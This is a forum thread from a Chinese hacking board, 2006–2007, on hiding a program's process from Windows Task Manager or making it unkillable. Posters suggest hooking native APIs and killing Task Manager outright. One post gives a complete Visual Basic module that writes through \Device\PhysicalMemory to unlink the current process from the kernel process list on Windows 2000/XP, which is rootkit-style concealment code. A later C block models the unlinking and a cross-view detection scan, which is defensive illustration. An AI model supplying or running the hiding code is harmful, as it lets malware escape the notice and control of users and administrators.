
Title: [Discussion] How to keep Task Manager from killing your own program's process

Author: 无条件为你    Time: 2006-12-23 11:35     Title: [Discussion] How to keep Task Manager from killing your own program's process

[This post was last edited by 无条件为你 on 2006/12/23 11:42am, 1st edit]

     I hope everyone will post their own approaches. On New Year's Day I will post my two original ideas (pure code, without pulling in any other DLL files).
In the spirit of technical exchange, I hope people won't be stingy with their source code!
The code only needs to solve either one of the following two points:
1. The process does not appear in Task Manager at all.
2. The process appears, but cannot be killed.


Author: 默数悲伤    Time: 2006-12-23 11:47     Title: [Discussion] How to keep Task Manager from killing your own program's process

Hook NTQuerySystemInformation so Task Manager can't see it,
or hook NTOpenProcess and NTTerminateProcess so it can't end it.


Author: 无条件为你    Time: 2006-12-23 12:44     Title: [Discussion] How to keep Task Manager from killing your own program's process

Quoting 默数悲伤, posted 2006/12/23 11:47am:
Hook NTQuerySystemInformation so Task Manager can't see it
or hook NTOpenProcess and NTTerminateProcess so it can't end it
I don't understand what you're describing; could you give an example? My implementation is something I worked out myself, with nobody to show the way, so I took quite a few detours while exploring. On January 1, 2007 I will post the code, with detailed comments that anyone can follow.
Author: 默数悲伤    Time: 2006-12-23 13:00     Title: [Discussion] How to keep Task Manager from killing your own program's process

Fine, I look forward to the OP's masterpiece.
But you say you won't pull in any DLL; that seems impossible, how would the program run at all?
Actually, getting past Task Manager isn't the most important thing.
There are far too many process-killing tools these days; if you go by finding the window, that's not a good method, and a tool like IceSword keeps changing its window title.
I hope the OP can come up with a completely new, general method to treat us newbies.
Author: 无条件为你    Time: 2006-12-23 17:03     Title: [Discussion] How to keep Task Manager from killing your own program's process

     The program itself doesn't pull in any DLL, but the precondition is that you have an operating system. In other words, the key DLLs the OS needs in order to run are of course there; otherwise the system wouldn't even boot, so what would be the point?
     This only discusses what works against Task Manager, not other process-killing software.
     Hardly a masterpiece, just a small trick.
     The reason I'm waiting until New Year's Day to explain my idea is to leave some time for others to publish the methods they already know. If everyone who shows up is stingy with their source and just takes without giving, then I'll only publish the EXE when the time comes. If I see even one other person reply with code that compiles (and does what's described), I'll publish both of my methods without holding anything back.
Author: x86    Time: 2006-12-23 18:55     Title: [Discussion] How to keep Task Manager from killing your own program's process

Actually I have a guess about the OP's method too, but I can't say it yet.
I'll comment once the OP's source is out.
I've only touched this in theory and never tested it in practice. I've only done process-creation monitoring.
Talking theory is enough here; it doesn't have to be a concrete implementation.
And the OP needn't insist that others release source before releasing yours; if you don't want to release it, we can still swap ideas.
Author: 无条件为你    Time: 2006-12-23 21:08     Title: [Discussion] How to keep Task Manager from killing your own program's process

Well said by the poster above; that's what I like to hear.
My approach is nothing exotic, though usually nobody thinks of it, and it's already implemented and built into an EXE.
If you have a guess, feel free to say it; maybe your guess is another approach I don't know about.
Author: 狰狞的怪    Time: 2007-1-26 05:10     Title: [Discussion] How to keep Task Manager from killing your own program's process

I've seen a piece of code that can hide a process, but I'm at an Internet cafe now; I'll post it once I'm back in the dorm.
Author: 狰狞的怪    Time: 2007-1-26 21:44     Title: [Discussion] How to keep Task Manager from killing your own program's process

Ok, found it.
Author: 我是中国人    Time: 2007-2-15 22:19     Title: [Discussion] How to keep Task Manager from killing your own program's process

I'll give you some code that hides the process directly from the process list. Completely hidden under 2000/XP; only Jiangmin (江民) and IceSword (冰刃) can see it. The VC++ version works even better.

Option Explicit
'-----------------------------------------------------
'Module name: modHideProcess.bas
'
'Purpose: hide the current process from the XP/2K Task Manager process list
'
'Usage: call HideCurrentProcess() directly

Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HANDLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4

Private Type IO_STATUS_BLOCK
    Status As Long
    Information As Long
End Type

Private Type UNICODE_STRING
    Length As Integer
    MaximumLength As Integer
    Buffer As Long
End Type

Private Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HANDLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2

Private Type OBJECT_ATTRIBUTES
    Length As Long
    RootDirectory As Long
    ObjectName As Long
    Attributes As Long
    SecurityDescriptor As Long
    SecurityQualityOfService As Long
End Type

Private Type ACL
    AclRevision As Byte
    Sbz1 As Byte
    AclSize As Integer
    AceCount As Integer
    Sbz2 As Integer
End Type

Private Enum ACCESS_MODE
    NOT_USED_ACCESS
    GRANT_ACCESS
    SET_ACCESS
    DENY_ACCESS
    REVOKE_ACCESS
    SET_AUDIT_SUCCESS
    SET_AUDIT_FAILURE
End Enum

Private Enum MULTIPLE_TRUSTEE_OPERATION
    NO_MULTIPLE_TRUSTEE
    TRUSTEE_IS_IMPERSONATE
End Enum

Private Enum TRUSTEE_FORM
    TRUSTEE_IS_SID
    TRUSTEE_IS_NAME
End Enum

Private Enum TRUSTEE_TYPE
    TRUSTEE_IS_UNKNOWN
    TRUSTEE_IS_USER
    TRUSTEE_IS_GROUP
End Enum

Private Type TRUSTEE
    pMultipleTrustee As Long
    MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm As TRUSTEE_FORM
    TrusteeType As TRUSTEE_TYPE
    ptstrName As String
End Type

Private Type EXPLICIT_ACCESS
    grfAccessPermissions As Long
    grfAccessMode As ACCESS_MODE
    grfInheritance As Long
    TRUSTEE As TRUSTEE
End Type

Private Type AceArray
    List() As EXPLICIT_ACCESS
End Type

Private Enum SE_OBJECT_TYPE
    SE_UNKNOWN_OBJECT_TYPE = 0
    SE_FILE_OBJECT
    SE_SERVICE
    SE_PRINTER
    SE_REGISTRY_KEY
    SE_LMSHARE
    SE_KERNEL_OBJECT
    SE_WINDOW_OBJECT
    SE_DS_OBJECT
    SE_DS_OBJECT_ALL
    SE_PROVIDER_DEFINED_OBJECT
    SE_WMIGUID_OBJECT
End Enum

Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type

Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDescriptor As Long) As Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long

Private verinfo As OSVERSIONINFO
Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long    'view of the page directory
Private g_hMPM As Long                  'handle to \Device\PhysicalMemory
Private aByte(3) As Byte

Public Sub HideCurrentProcess()
    'Hide the current application's process from the process list
    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

    'EPROCESS field offsets differ between Windows 2000 (5.0) and XP (5.1)
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0
                        lOffsetFlink = &HA0
                        lOffsetBlink = &HA4
                        lOffsetPID = &H9C
                    Case 1
                        lOffsetFlink = &H88
                        lOffsetBlink = &H8C
                        lOffsetPID = &H84
                End Select
            End If
        End If
    End If

    'Current KTHREAD via the KPCR, then its owning process, then unlink that
    'process's ActiveProcessLinks entry (next.Blink = prev; prev.Flink = next)
    If OpenPhysicalMemory <> 0 Then
        thread = GetData(&HFFDFF124)
        process = GetData(thread + &H44)
        fw = GetData(process + lOffsetFlink)
        bw = GetData(process + lOffsetBlink)
        SetData fw + 4, bw
        SetData bw, fw
        CloseHandle g_hMPM
    End If
End Sub

Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
    'Grant the current user SECTION_MAP_WRITE on the section's DACL
    Dim pDacl As Long
    Dim pNewDacl As Long
    Dim pSD As Long
    Dim dwRes As Long
    Dim ea As EXPLICIT_ACCESS

    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
    ea.grfAccessPermissions = SECTION_MAP_WRITE
    ea.grfAccessMode = GRANT_ACCESS
    ea.grfInheritance = NO_INHERITANCE
    ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
    ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
    ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
    SetEntriesInAcl 1, ea, pDacl, pNewDacl
    SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
CleanUp:
    LocalFree pSD
    LocalFree pNewDacl
End Sub

Private Function OpenPhysicalMemory() As Long
    'Open the \Device\PhysicalMemory section (user-mode reachable on 2000/XP);
    'on access denied, widen its DACL and retry. Returns the handle, or 0 on failure.
    Dim Status As Long
    Dim PhysmemString As UNICODE_STRING
    Dim Attributes As OBJECT_ATTRIBUTES

    RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
    Attributes.Length = Len(Attributes)
    Attributes.RootDirectory = 0
    Attributes.ObjectName = VarPtr(PhysmemString)
    Attributes.Attributes = 0
    Attributes.SecurityDescriptor = 0
    Attributes.SecurityQualityOfService = 0

    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    If Status = STATUS_ACCESS_DENIED Then
        Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
        SetPhyscialMemorySectionCanBeWrited g_hMPM
        CloseHandle g_hMPM
        Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    End If

    'Physical address of the page directory, by OS version
    Dim lDirectory As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0
                        lDirectory = &H30000
                    Case 1
                        lDirectory = &H39000
                End Select
            End If
        End If
    End If

    If Status = 0 Then
        g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectory, &H1000)
        If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
    End If
End Function

Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
    'Walk the x86 page directory / page table to translate a linear address
    'to a physical one; handles 4 MB large pages (PDE bit 7). Returns 0 if not present.
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
    Dim lTemp As Long

    VAddr = addr
    CopyMemory aByte(0), VAddr, 4
    lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))   'unsigned PDE index
    PGDE = BaseAddress + lTemp * 4
    CopyMemory PGDE, ByVal PGDE, 4
    If (PGDE And 1) <> 0 Then
        lTemp = PGDE And &H80
        If lTemp <> 0 Then
            PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
        Else
            PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
            lTemp = (VAddr And &H3FF000) / (2 ^ 12)
            PTE = PGDE + lTemp * 4
            CopyMemory PTE, ByVal PTE, 4
            If (PTE And 1) <> 0 Then
                PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
            End If
            UnmapViewOfFile PGDE   'always release the page-table view
        End If
    End If
    LinearToPhys = PAddr
End Function

Private Function GetData(addr As Long) As Long
    'Read a 4-byte value from kernel linear address addr via physical memory
    Dim phys As Long, tmp As Long, ret As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        ret = tmp + (phys And &HFFF)
        CopyMemory ret, ByVal ret, 4
        UnmapViewOfFile tmp
        GetData = ret
    End If
End Function

Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
    'Write a 4-byte value to kernel linear address addr via physical memory
    Dim phys As Long, tmp As Long, x As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        x = tmp + (phys And &HFFF)
        CopyMemory ByVal x, data, 4
        UnmapViewOfFile tmp
        SetData = True
    End If
End Function

Private Function ByteArrToLong(inByte() As Byte) As Double
    'Little-endian bytes to an unsigned value (Double, to avoid Long sign issues)
    Dim I As Integer
    For I = 0 To 3
        ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
    Next I
End Function

Call it with:
App.TaskVisible = False
Call HideCurrentProcess
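As an added illustration (not code from the thread), the C model below shows at the data-structure level why the two pointer writes in the posted module make a process disappear from a list walk, and how a tag scan over the pool, the cross-view check that tools like IceSword rely on, still finds it. The EPROCESS layout, pool tag and PIDs are constructed for the model, not real offsets.

```c
#include <stddef.h>
/* Constructed model of the x86 EPROCESS fields the posted module touches (pool tag, PID,
 * ActiveProcessLinks). Illustrative layout; real offsets vary per build, as the VB version switch shows. */
typedef struct list_entry { struct list_entry *Flink, *Blink; } LIST_ENTRY;
typedef struct { unsigned Tag, UniqueProcessId; LIST_ENTRY ActiveProcessLinks; } EPROCESS;
#define PROC_TAG 0x636F7250u                     /* 'Proc' */
#define NPROC 5
#define FROM_LINK(e) ((EPROCESS *)((char *)(e) - offsetof(EPROCESS, ActiveProcessLinks)))
static EPROCESS pool[NPROC];                     /* every object, linked into the list or not */
static LIST_ENTRY PsActiveProcessHead;           /* the list that list-based enumeration walks */
/* Constructed sample: five processes appended at the tail in PID order. */
void build_list(void) {
    static const unsigned pids[NPROC] = {4, 100, 200, 300, 400};
    PsActiveProcessHead.Flink = PsActiveProcessHead.Blink = &PsActiveProcessHead;
    for (int i = 0; i < NPROC; i++) {
        LIST_ENTRY *e = &pool[i].ActiveProcessLinks, *tail = PsActiveProcessHead.Blink;
        pool[i].Tag = PROC_TAG; pool[i].UniqueProcessId = pids[i];
        e->Flink = &PsActiveProcessHead; e->Blink = tail; tail->Flink = e; PsActiveProcessHead.Blink = e;
    }
}
/* The two writes the posted module performs (fw->Blink = bw, bw->Flink = fw), reproduced in the
 * model so the detector below has a case to catch. The object itself stays in the pool. */
void unlink_pid(unsigned pid) {
    for (int i = 0; i < NPROC; i++) if (pool[i].UniqueProcessId == pid) {
        LIST_ENTRY *fw = pool[i].ActiveProcessLinks.Flink, *bw = pool[i].ActiveProcessLinks.Blink;
        fw->Blink = bw; bw->Flink = fw;
    }
}
/* View 1: list walk, the basis of Task Manager's process list. */
int enumerate_by_list(unsigned *out, int max) {
    int n = 0;
    for (LIST_ENTRY *e = PsActiveProcessHead.Flink; e != &PsActiveProcessHead && n < max; e = e->Flink)
        out[n++] = FROM_LINK(e)->UniqueProcessId;
    return n;
}
/* View 2: tag scan over the pool, which never consults the list. */
int enumerate_by_scan(unsigned *out, int max) {
    int n = 0;
    for (int i = 0; i < NPROC && n < max; i++) if (pool[i].Tag == PROC_TAG) out[n++] = pool[i].UniqueProcessId;
    return n;
}
/* Cross-view check: any PID the scan finds but the list walk misses is hidden. */
int find_hidden(unsigned *hidden, int max) {
    unsigned l[NPROC], s[NPROC];
    int nl = enumerate_by_list(l, NPROC), ns = enumerate_by_scan(s, NPROC), nh = 0;
    for (int i = 0, j; i < ns; i++) {
        for (j = 0; j < nl && l[j] != s[i]; j++) ;   /* is s[i] in the list view? */
        if (j == nl && nh < max) hidden[nh++] = s[i];
    }
    return nh;
}
```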
Author: 无条件为你    Time: 2007-3-9 13:26     Title: [Discussion] How to keep Task Manager from killing your own program's process

Quoting 狰狞的怪, posted 2007/01/26 09:44pm:
Ok, found it.
When I compile yours under VC6.0 it says it can't find psapi.h.

Author: htz92127    Time: 2007-3-15 22:06

Simpler: just have the program kill Task Manager.




Welcome to 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2